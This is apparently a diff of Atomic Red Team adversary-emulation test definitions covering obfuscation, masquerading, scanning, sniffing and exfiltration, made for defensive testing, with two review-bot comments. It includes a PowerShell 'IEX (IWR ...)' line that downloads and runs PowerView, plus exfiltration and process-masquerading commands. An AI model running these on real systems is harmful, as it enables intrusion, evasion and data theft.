**auto_generated_guid:** ffe2346c-abd5-4b45-a713-bf5f1ebd573a
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_pad | Path of binary to be padded | Path | /tmp/evil-binary|
@@ -45,7 +49,7 @@ rm #{file_to_pad}
##### Description: The binary must exist on disk at specified location (#{file_to_pad})
##### Check Prereq Commands:
```bash
if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi;
if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```bash
+20 -4
@@ -24,10 +24,14 @@ No other protection/compression were applied.
**Supported Platforms:** Linux
**auto_generated_guid:** 11c46cd8-e471-450e-acb8-52a1216ae6a4
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| bin_path | Packed binary | Path | PathToAtomicsFolder/T1027.002/bin/linux/test_upx|
@@ -60,10 +64,14 @@ by some methods, and especially UPX is not able to uncompress it any more.
**Supported Platforms:** Linux
**auto_generated_guid:** f06197f8-ff46-48c2-a0c6-afc1b50665e1
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| bin_path | Packed binary | Path | PathToAtomicsFolder/T1027.002/bin/linux/test_upx_header_changed|
@@ -94,10 +102,14 @@ No other protection/compression were applied.
**Supported Platforms:** macOS
**auto_generated_guid:** b16ef901-00bb-4dda-b4fc-a04db5067e20
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| bin_path | Packed binary | Path | PathToAtomicsFolder/T1027.002/bin/darwin/test_upx|
@@ -130,10 +142,14 @@ by some methods, and especially UPX is not able to uncompress it any more.
**Supported Platforms:** macOS
**auto_generated_guid:** 4d46e16b-5765-4046-9f25-a600d3e65e4d
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| bin_path | Packed binary | Path | PathToAtomicsFolder/T1027.002/bin/darwin/test_upx_header_changed|
+12 -4
@@ -20,10 +20,14 @@ Upon execution an exe named T1027.004.exe will be placed in the temp folder
**Supported Platforms:** Windows
**auto_generated_guid:** ffcdbd6a-b0e8-487d-927a-09127fe9a206
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Output compiled binary | Path | C:&#92;Windows&#92;Temp&#92;T1027.004.exe|
| input_file | C# code that launches calc.exe from a hidden cmd.exe Window | Path | PathToAtomicsFolder&#92;T1027.004&#92;src&#92;calc.cs|
@@ -47,7 +51,7 @@ del #{output_file} >nul 2>&1
##### Description: C# file must exist on disk at specified location (#{input_file})
##### Check Prereq Commands:
```powershell
if (Test-Path #{input_file}) {exit 0} else {exit 1}
if (Test-Path #{input_file}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -70,10 +74,14 @@ Upon execution, the exe will print 'T1027.004 Dynamic Compile'.
**Supported Platforms:** Windows
**auto_generated_guid:** 453614d8-3ba6-4147-acc0-7ec4b3e1faef
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | exe program containing dynamically compiled C# code | Path | PathToAtomicsFolder&#92;T1027.004&#92;bin&#92;T1027.004_DynamicCompile.exe|
@@ -92,7 +100,7 @@ Invoke-Expression #{input_file}
##### Description: exe file must exist on disk at specified location (#{input_file})
##### Check Prereq Commands:
```powershell
if (Test-Path #{input_file}) {exit 0} else {exit 1}
if (Test-Path #{input_file}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
+30 -6
@@ -33,6 +33,10 @@ Upon successful execution, sh will execute art.sh, which is a base64 encoded com
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** f45df6be-2e1e-4136-a384-8f18ab3826fb
@@ -62,10 +66,14 @@ Upon successful execution, powershell will execute an encoded command and stdout
**Supported Platforms:** Windows
**auto_generated_guid:** a50d5a97-2531-499e-a1de-5544c74432c6
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| powershell_command | PowerShell command to encode | String | Write-Host "Hey, Atomic!"|
@@ -97,10 +105,14 @@ Upon successful execution, powershell will execute encoded command and read/writ
**Supported Platforms:** Windows
**auto_generated_guid:** 450e7218-7915-4be4-8b9b-464a49eafcec
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| registry_key_storage | Windows Registry Key to store code | String | HKCU:Software&#92;Microsoft&#92;Windows&#92;CurrentVersion|
| powershell_command | PowerShell command to encode | String | Write-Host "Hey, Atomic!"|
@@ -138,10 +150,14 @@ Mimic execution of compressed executable. When successfully executed, calculator
**Supported Platforms:** Windows
**auto_generated_guid:** f8c8a909-5f29-49ac-9244-413936ce6d1f
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| url_path | url to download Exe | url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027/bin/T1027.zip|
@@ -166,7 +182,7 @@ del /Q "%temp%\T1027.zip" >nul 2>nul
##### Description: T1027.exe must exist on disk at $env:temp\temp_T1027.zip\T1027.exe
##### Check Prereq Commands:
```powershell
if (Test-Path $env:temp\temp_T1027.zip\T1027.exe) {exit 0} else {exit 1}
if (Test-Path $env:temp\temp_T1027.zip\T1027.exe) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -188,10 +204,14 @@ Sensitive data includes about around 20 odd simulated credit card numbers that p
**Supported Platforms:** Windows
**auto_generated_guid:** 129edb75-d7b8-42cd-a8ba-1f3db64ec4ad
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path of the XLSM file | path | PathToAtomicsFolder&#92;T1027&#92;src&#92;T1027-cc-macro.xlsm|
| sender | sender email | string | test@corp.com|
@@ -221,10 +241,14 @@ Sensitive data includes about around 20 odd simulated credit card numbers that p
**Supported Platforms:** Windows
**auto_generated_guid:** e2d85e66-cb66-4ed7-93b1-833fc56c9319
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path of the XLSM file | path | PathToAtomicsFolder&#92;T1027&#92;src&#92;T1027-cc-macro.xlsm|
| ip_address | Destination IP address | string | 127.0.0.1|
+6 -2
@@ -15,10 +15,14 @@ Take a file/directory, split it into 5Mb chunks
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** ab936c51-10f4-46ce-9144-e02137b2016a
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_name | File name | Path | T1030_urandom|
| folder_path | Path where the test creates artifacts | Path | /tmp/T1030|
@@ -43,7 +47,7 @@ if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi;
##### Description: The file must exist for the test to run.
##### Check Prereq Commands:
```sh
if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else exit 0; fi;
if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else exit 0; fi;
```
##### Get Prereq Commands:
```sh
+14 -1
@@ -24,10 +24,14 @@ Additionally, two files will be written to disk - computers.txt and usernames.tx
**Supported Platforms:** Windows
**auto_generated_guid:** 4c4959bf-addf-4b4a-be86-8d09cc1857aa
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| computer_name | Name of remote computer | string | localhost|
@@ -62,6 +66,10 @@ Upon successful execution, sh will stdout list of usernames.
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 2a9b677d-a230-44f4-ad86-782df1ef108c
@@ -88,6 +96,10 @@ Find existing user session on other computers. Upon execution, information about
**Supported Platforms:** Windows
**auto_generated_guid:** 29857f27-a36f-4f7e-8084-4557cd6207ca
@@ -95,6 +107,7 @@ Find existing user session on other computers. Upon execution, information about
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose
```
+1
@@ -48,5 +48,6 @@ atomic_tests:
- windows
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose
name: powershell
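Review bot: The added `[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12` assignment replaces the process-wide protocol set rather than extending it, so any newer protocol the host already had enabled is dropped for the rest of the test process. If the intent is only to guarantee TLS 1.2 is available for the download, the additive form `[Net.ServicePointManager]::SecurityProtocol = [Net.ServicePointManager]::SecurityProtocol -bor [Net.SecurityProtocolType]::Tls12` keeps the existing set. A short PowerShell comment on why the line is needed (the default protocol set on older .NET/Windows hosts presumably does not include TLS 1.2, which this download endpoint requires) would help the next maintainer, since the line otherwise looks unrelated to the test. The same line appears in the generated markdown in the preceding file section; that file is generated from this YAML, so it needs no separate change.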
+40 -4
@@ -33,6 +33,10 @@ Upon execution, cmd will be launched by powershell. If using Invoke-AtomicTest,
**Supported Platforms:** Windows
**auto_generated_guid:** 5ba5a3d1-cf3c-4499-968a-a93155d1f717
@@ -64,6 +68,10 @@ Upon successful execution, sh is renamed to `crond` and executed.
**Supported Platforms:** Linux
**auto_generated_guid:** a315bfff-7a98-403b-b442-2ea1b255e556
@@ -95,6 +103,10 @@ Upon successful execution, cscript.exe is renamed as notepad.exe and executed fr
**Supported Platforms:** Windows
**auto_generated_guid:** 3a2a578b-0a01-46e4-92e3-62e2859b42f0
@@ -126,6 +138,10 @@ Upon execution, no windows will remain open but wscript will have been renamed t
**Supported Platforms:** Windows
**auto_generated_guid:** 24136435-c91a-4ede-9da1-8b284a1c1a23
@@ -157,6 +173,10 @@ Upon successful execution, powershell.exe is renamed as taskhostw.exe and execut
**Supported Platforms:** Windows
**auto_generated_guid:** ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa
@@ -188,10 +208,14 @@ Upon successful execution, powershell will execute T1036.003.exe as svchost.exe
**Supported Platforms:** Windows
**auto_generated_guid:** bc15c13f-d121-4b1f-8c7d-28d95854d086
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| outputfile | path of file to execute | path | ($env:TEMP + "&#92;svchost.exe")|
| inputfile | path of file to copy | path | PathToAtomicsFolder&#92;T1036.003&#92;bin&#92;T1036.003.exe|
@@ -217,7 +241,7 @@ Remove-Item #{outputfile} -Force -ErrorAction Ignore
##### Description: Exe file to copy must exist on disk at specified location (#{inputfile})
##### Check Prereq Commands:
```powershell
if (Test-Path #{inputfile}) {exit 0} else {exit 1}
if (Test-Path #{inputfile}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -237,10 +261,14 @@ Copies a windows exe, renames it as another windows exe, and launches it to masq
**Supported Platforms:** Windows
**auto_generated_guid:** c3d24a39-2bfe-4c6a-b064-90cd73896cb0
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| outputfile | path of file to execute | path | ($env:TEMP + "&#92;svchost.exe")|
| inputfile | path of file to copy | path | $env:ComSpec|
@@ -276,6 +304,10 @@ Upon successful execution, cmd.exe will be renamed as lsm.exe and executed from
**Supported Platforms:** Windows
**auto_generated_guid:** 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f
@@ -308,10 +340,14 @@ e.g SOME_LEGIT_NAME.[doc,docx,xls,xlsx,pdf,rtf,png,jpg,etc.].[exe,vbs,js,ps1,etc
**Supported Platforms:** Windows
**auto_generated_guid:** c7fa0c3b-b57f-4cba-9118-863bf4e653fc
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| exe_path | path to exe to use when creating masquerading files | path | C:&#92;Windows&#92;System32&#92;calc.exe|
| vbs_path | path of vbs to use when creating masquerading files | path | PathToAtomicsFolder&#92;T1036.003&#92;src&#92;T1036.003_masquerading.vbs|
+8
@@ -19,6 +19,10 @@ Creating W32Time similar named service (win32times) using schtasks just like thr
**Supported Platforms:** Windows
**auto_generated_guid:** f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9
@@ -48,6 +52,10 @@ Creating W32Time similar named service (win32times) using sc just like threat ac
**Supported Platforms:** Windows
**auto_generated_guid:** b721c6ef-472c-4263-a0d9-37f1f4ecff66
+51
@@ -0,0 +1,51 @@
# T1036.005 - Match Legitimate Name or Location
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1036/005)
<blockquote>Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
Adversaries may also use the same icon of the file they are trying to mimic.</blockquote>
## Atomic Tests
- [Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory.](#atomic-test-1---execute-a-process-from-a-directory-masquerading-as-the-current-parent-directory)
<br/>
## Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory.
Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`)
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** 812c3ab8-94b0-4698-a9bf-9420af23ce24
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| test_message | Test message to echo out to the screen | String | Hello from the Atomic Red Team test T1036.005#1|
#### Attack Commands: Run with `sh`!
```sh
mkdir $HOME/...
cp $(which sh) $HOME/...
$HOME/.../sh -c "echo #{test_message}"
```
#### Cleanup Commands:
```sh
rm -f $HOME/.../sh
rmdir $HOME/.../
```
<br/>
+30
@@ -0,0 +1,30 @@
---
attack_technique: T1036.005
display_name: 'Masquerading: Match Legitimate Name or Location'
atomic_tests:
- name: Execute a process from a directory masquerading as the current parent directory.
auto_generated_guid: 812c3ab8-94b0-4698-a9bf-9420af23ce24
description: |
Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`)
supported_platforms:
- macos
- linux
input_arguments:
test_message:
description: Test message to echo out to the screen
type: String
default: Hello from the Atomic Red Team test T1036.005#1
executor:
name: sh
elevation_required: false
command: |
mkdir $HOME/...
cp $(which sh) $HOME/...
$HOME/.../sh -c "echo #{test_message}"
cleanup_command: |
rm -f $HOME/.../sh
rmdir $HOME/.../
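Review bot: `mkdir $HOME/...` in the new test's command has no `-p`, so a re-run after an interrupted or failed cleanup aborts at the first line with "File exists" and the copied shell from the previous run is left in place. `mkdir -p $HOME/...` makes the test idempotent, and `cp "$(command -v sh)" $HOME/...` is the POSIX-portable way to locate the interpreter, since `which` is not guaranteed on every macOS/Linux image the test declares support for. The cleanup block already uses `rm -f`, so it tolerates the partial state; only the setup side needs the change.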
+4
@@ -19,6 +19,10 @@ Space After Filename
**Supported Platforms:** macOS
**auto_generated_guid:** 89a7dd26-e510-4c9f-9b15-f3bae333360f
#### Run it with these steps!
+4
@@ -17,6 +17,10 @@ It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a n
**Supported Platforms:** Windows
**auto_generated_guid:** 51005ac7-52e2-45e0-bdab-d17c6d4916cd
+5 -1
@@ -18,10 +18,14 @@ that can be viewed in the Registry Editor.
**Supported Platforms:** Windows
**auto_generated_guid:** d6042746-07d4-4c92-9ad8-e644c114a231
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| script_path | Path to .bat file | String | %temp%&#92;art.bat|
| script_command | Command To Execute | String | echo Art "Logon Script" atomic test was successful. >> %USERPROFILE%&#92;desktop&#92;T1037.001-log.txt|
+4
@@ -17,6 +17,10 @@ Mac logon script
**Supported Platforms:** macOS
**auto_generated_guid:** f047c7de-a2d9-406e-a62b-12a09d9516f4
#### Run it with these steps!
+12
@@ -27,6 +27,10 @@ Modify rc.common
**Supported Platforms:** macOS
**auto_generated_guid:** 97a48daa-8bca-4bc0-b1a9-c1d163e762de
@@ -51,6 +55,10 @@ Modify rc.common
**Supported Platforms:** Linux
**auto_generated_guid:** c33f3d80-5f04-419b-a13a-854d1cbdbf3a
@@ -83,6 +91,10 @@ Modify rc.local
**Supported Platforms:** Linux
**auto_generated_guid:** 126f71af-e1c9-405c-94ef-26a47b16c102
+4
@@ -21,6 +21,10 @@ Modify or create an file in /Library/StartupItems
**Supported Platforms:** macOS
**auto_generated_guid:** 134627c3-75db-410e-bff8-7a920075f198
+23 -7
@@ -27,10 +27,14 @@ Upon successful execution, tshark or tcpdump will execute and capture 5 packets
**Supported Platforms:** Linux
**auto_generated_guid:** 7fe741f7-b265-4951-a7c7-320889083b3e
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| interface | Specify interface to perform PCAP on. | String | ens33|
@@ -50,7 +54,7 @@ tshark -c 5 -i #{interface}
##### Description: Check if at least one of the tools are installed on the machine.
##### Check Prereq Commands:
```bash
if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi;
if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi;
```
##### Get Prereq Commands:
```bash
@@ -71,10 +75,14 @@ Upon successful execution, tshark or tcpdump will execute and capture 5 packets
**Supported Platforms:** macOS
**auto_generated_guid:** 9d04efee-eff5-4240-b8d2-07792b873608
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| interface | Specify interface to perform PCAP on. | String | en0A|
@@ -94,7 +102,7 @@ if [ -x "$(command -v tshark)" ]; then sudo tshark -c 5 -i #{interface}; fi;
##### Description: Check if at least one of the tools are installed on the machine.
##### Check Prereq Commands:
```bash
if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi;
if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi;
```
##### Get Prereq Commands:
```bash
@@ -116,10 +124,14 @@ Upon successful execution, tshark will execute and capture 5 packets on interfac
**Supported Platforms:** Windows
**auto_generated_guid:** a5b2f6a0-24b4-493e-9590-c699f75723ca
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| interface | Specify interface to perform PCAP on. | String | Ethernet|
| wireshark_url | wireshark installer download URL | url | https://1.eu.dl.wireshark.org/win64/Wireshark-win64-3.4.5.exe|
@@ -142,7 +154,7 @@ Upon successful execution, tshark will execute and capture 5 packets on interfac
##### Description: tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe".
##### Check Prereq Commands:
```powershell
if (test-path "#{tshark_path}") {exit 0} else {exit 1}
if (test-path "#{tshark_path}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -152,7 +164,7 @@ Start-Process $env:temp\wireshark_installer.exe /S
##### Description: npcap must be installed.
##### Check Prereq Commands:
```powershell
if (test-path "#{npcap_path}") {exit 0} else {exit 1}
if (test-path "#{npcap_path}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -173,6 +185,10 @@ After execution you should find a file named trace.etl and trace.cab in the temp
**Supported Platforms:** Windows
**auto_generated_guid:** b5656f67-d67f-4de8-8e62-b5581630f528
+22 -6
@@ -25,6 +25,10 @@ Upon successful execution, sh will perform a network connection against a single
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 68e907da-2539-48f6-9fc9-257a78c05540
@@ -54,10 +58,14 @@ Upon successful execution, sh will utilize nmap, telnet, and nc to contact a sin
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 515942b0-a09f-4163-a7bb-22fefb6f185f
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| host | Host to scan. | string | 192.168.1.1|
| port | Ports to scan. | string | 80|
@@ -80,7 +88,7 @@ nc -nv #{host} #{port}
##### Description: Check if nmap command exists on the machine
##### Check Prereq Commands:
```sh
if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi;
if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```sh
@@ -99,10 +107,14 @@ Scan ports to check for listening ports for the local host 127.0.0.1
**Supported Platforms:** Windows
**auto_generated_guid:** d696a3cb-d7a8-4976-8eb5-5af4abf2e3df
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| nmap_url | NMap installer download URL | url | https://nmap.org/dist/nmap-7.80-setup.exe|
| host_to_scan | The host to scan with NMap | string | 127.0.0.1|
@@ -122,7 +134,7 @@ nmap #{host_to_scan}
##### Description: NMap must be installed
##### Check Prereq Commands:
```powershell
if (cmd /c "nmap 2>nul") {exit 0} else {exit 1}
if (cmd /c "nmap 2>nul") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -142,10 +154,14 @@ Scan ports to check for listening ports with python
**Supported Platforms:** Windows
**auto_generated_guid:** 6ca45b04-9f15-4424-b9d3-84a217285a5c
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| host_ip | Host to scan. | string | 127.0.0.1|
| filename | Location of the project file | Path | PathToAtomicsFolder&#92;T1046&#92;src&#92;T1046.py|
@@ -165,7 +181,7 @@ python #(unknown) -i #{host_ip}
##### Description: Check if python exists on the machine
##### Check Prereq Commands:
```powershell
if (python --version) {exit 0} else {exit 1}
if (python --version) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
+36 -4
@@ -32,6 +32,10 @@ When the test completes , there should be local user accounts information displa
**Supported Platforms:** Windows
**auto_generated_guid:** c107778c-dcf5-47c5-af2e-1d058a3df3ea
@@ -57,6 +61,10 @@ When the test completes , there should be running processes listed on the comman
**Supported Platforms:** Windows
**auto_generated_guid:** 5750aa16-0e59-4410-8b9a-8a47ca2788e2
@@ -82,6 +90,10 @@ When the test completes, there should be a list of installed patches and when th
**Supported Platforms:** Windows
**auto_generated_guid:** 718aebaa-d0e0-471a-8241-c5afa69c7414
@@ -110,10 +122,14 @@ if the provided remote host is unreacheable
**Supported Platforms:** Windows
**auto_generated_guid:** 0fd48ef7-d890-4e93-a533-f7dedd5191d3
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| node | Ip Address | String | 127.0.0.1|
| service_search_string | Name Of Service | String | Spooler|
@@ -141,10 +157,14 @@ When the test completes , a new process will be started locally .A notepad appli
**Supported Platforms:** Windows
**auto_generated_guid:** b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| process_to_execute | Name or path of process to execute. | String | notepad.exe|
@@ -176,10 +196,14 @@ A common error message is "Node - (provided IP or default) ERROR Description =T
**Supported Platforms:** Windows
**auto_generated_guid:** 9c8ef159-c666-472f-9874-90c8d60d136b
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| node | Ip Address | String | 127.0.0.1|
| user_name | Username | String | DOMAIN&#92;Administrator|
@@ -218,6 +242,10 @@ You should expect to see notepad.exe running after execution of this test.
**Supported Platforms:** Windows
**auto_generated_guid:** 7db7a7f9-9531-4840-9b30-46220135441c
@@ -243,10 +271,14 @@ This test tries to mask process creation by creating a new class that inherits f
**Supported Platforms:** Windows
**auto_generated_guid:** 10447c83-fc38-462a-a936-5102363b1c43
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| new_class | Derived class name | String | Win32_Atomic|
| process_to_execute | Name or path of process to execute. | String | notepad.exe|
+23 -3
@@ -27,6 +27,10 @@ Upon successful execution, sh will be used to make a directory (/tmp/victim-stag
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff
#### Run it with these steps!
@@ -61,10 +65,14 @@ Upon successful execution, powershell will utilize ping (icmp) to exfiltrate not
**Supported Platforms:** Windows
**auto_generated_guid:** dd4b4421-2e25-4593-90ae-7021947ad12e
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path to file to be exfiltrated. | Path | C:&#92;Windows&#92;System32&#92;notepad.exe|
| ip_address | Destination IP address where the data should be sent. | String | 127.0.0.1|
@@ -91,6 +99,10 @@ Exfiltration of specified file over DNS protocol.
**Supported Platforms:** Linux
**auto_generated_guid:** c403b5a4-b5fc-49f2-b181-d1c80d27db45
#### Run it with these steps!
@@ -122,10 +134,14 @@ Upon successful execution, powershell will invoke web request using POST method
**Supported Platforms:** Windows
**auto_generated_guid:** 6aa58451-1121-4490-a8e9-1dada3f1c68c
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path to file to exfiltrate | Path | C:&#92;Windows&#92;System32&#92;notepad.exe|
| ip_address | Destination IP address where the data should be sent | String | http://127.0.0.1|
@@ -154,10 +170,14 @@ Upon successful execution, powershell will send an email with attached file to e
**Supported Platforms:** Windows
**auto_generated_guid:** ec3a835e-adca-4c7c-88d2-853b69c11bb9
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path to file to exfiltrate | Path | C:&#92;Windows&#92;System32&#92;notepad.exe|
| sender | The email address of the sender | String | test@corp.com|
+10 -2
@@ -25,10 +25,14 @@ Upon successful execution, sh will spawn ssh contacting a remote domain (default
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** f6786cc8-beda-4915-a4d6-ac2f193bb988
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | target SSH domain | url | target.example.com|
@@ -58,10 +62,14 @@ Upon successful execution, tar will compress /Users/* directory and password pro
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** 7c3cb337-35ae-4d06-bf03-3032ed2ec268
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | username for domain | string | atomic|
| password | password for user | string | atomic|
+19 -3
@@ -27,6 +27,10 @@ Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net se
**Supported Platforms:** Windows
**auto_generated_guid:** 0940a971-809a-48f1-9c4d-b1d785e96ee5
@@ -55,6 +59,10 @@ Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. R
**Supported Platforms:** Windows
**auto_generated_guid:** f069f0f1-baad-4831-aa2b-eddac4baac4a
@@ -81,6 +89,10 @@ Upon successful execution, sh will execute `netstat` and `who -a`. Results will
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2
@@ -99,7 +111,7 @@ who -a
##### Description: Check if netstat command exists on the machine
##### Check Prereq Commands:
```sh
if [ -x "$(command -v netstat)" ]; then exit 0; else exit 1; fi;
if [ -x "$(command -v netstat)" ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```sh
@@ -120,10 +132,14 @@ Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results
**Supported Platforms:** Windows
**auto_generated_guid:** 96f974bb-a0da-4d87-a744-ff33e73367e9
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| SharpView_url | sharpview download URL | url | https://github.com/tevora-threat/SharpView/blob/b60456286b41bb055ee7bc2a14d645410cca9b74/Compiled/SharpView.exe?raw=true|
| SharpView | Path of the executable opensource redteam tool used for the performing this atomic. | path | PathToAtomicsFolder&#92;T1049&#92;bin&#92;SharpView.exe|
@@ -146,7 +162,7 @@ foreach ($syntax in $syntaxList) {
##### Description: Sharpview.exe must exist on disk at specified location (#{SharpView})
##### Check Prereq Commands:
```powershell
if (Test-Path #{SharpView}) {exit 0} else {exit 1}
if (Test-Path #{SharpView}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
+7 -3
@@ -17,10 +17,14 @@ This test submits a command to be run in the future by the `at` daemon.
**Supported Platforms:** Linux
**auto_generated_guid:** 7266d898-ac82-4ec0-97c7-436075d0d08e
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| time_spec | Time specification of when the command should run | String | now + 1 minute|
| at_command | The command to be run | String | echo Hello from Atomic Red Team|
@@ -40,7 +44,7 @@ echo "#{at_command}" | at #{time_spec}
##### Description: The `at` and `atd` executables must exist in the PATH
##### Check Prereq Commands:
```sh
which at && which atd
which at && which atd
```
##### Get Prereq Commands:
```sh
@@ -49,7 +53,7 @@ echo 'Please install `at` and `atd`; they were not found in the PATH (Package na
##### Description: The `atd` daemon must be running
##### Check Prereq Commands:
```sh
systemctl status atd || service atd status
systemctl status atd || service atd status
```
##### Get Prereq Commands:
```sh
+4
@@ -22,6 +22,10 @@ Upon successful execution, cmd.exe will spawn at.exe and create a scheduled task
**Supported Platforms:** Windows
